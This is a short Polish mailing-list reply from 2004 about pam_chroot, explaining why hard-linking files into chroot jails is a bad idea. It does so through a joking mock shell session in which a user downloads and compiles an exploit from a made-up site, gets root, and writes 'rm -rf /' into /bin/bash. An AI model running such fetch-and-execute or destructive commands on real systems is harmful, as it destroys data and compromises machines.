pam_chroot - problem
Lukasz Klimek
lklimek w gmail.com
Czw, 16 Wrz 2004, 02:00:15 CEST
On Wed, 15 Sep 2004 15:22:07 +0200, Maciej ''Kasprzol'' Kasprzyk
<kasprzol w o2.pl> wrote:
[...]
> A tak z innej bajki - jak to jest na jednym systemie plików to nie lepiej
> zamiast kopiowania utworzyć twarde dowiązania?
nie :)
ssh user w serwer...
password: imieusera ;)
// zachrootowany ;)
[user w serwer ~] wget http://www.exploity.pl/exploit.c
[user w serwer ~] gcc exploit.c && ./a.out
exploit: you are root
[root w serwer ~] echo rm -rf / > /bin/bash
(gdzieś w odległej galaktyce, Prawdziwy Root, bez chroota...)
[root w serwer ~] bash
...goodbye california ;)...
Explanation: linki statyczne wskazują do tych samych danych. Jak user
nadpisze u siebie
w chroocie cokolwiek to wszyscy inni userzy będą mieli to, co on tam wpisał.
ps. witam wszystkich, zapisałem się niedawno, bo testuję gmaila i chcę
mieć dużo śmieci w skrzynce ;)
pzdr.
--
Lukasz Klimek :: http://casa.fajni.net
Szczecin Linux/Unix Users' Group
Więcej informacji o liście dyskusyjnej pld-users-pl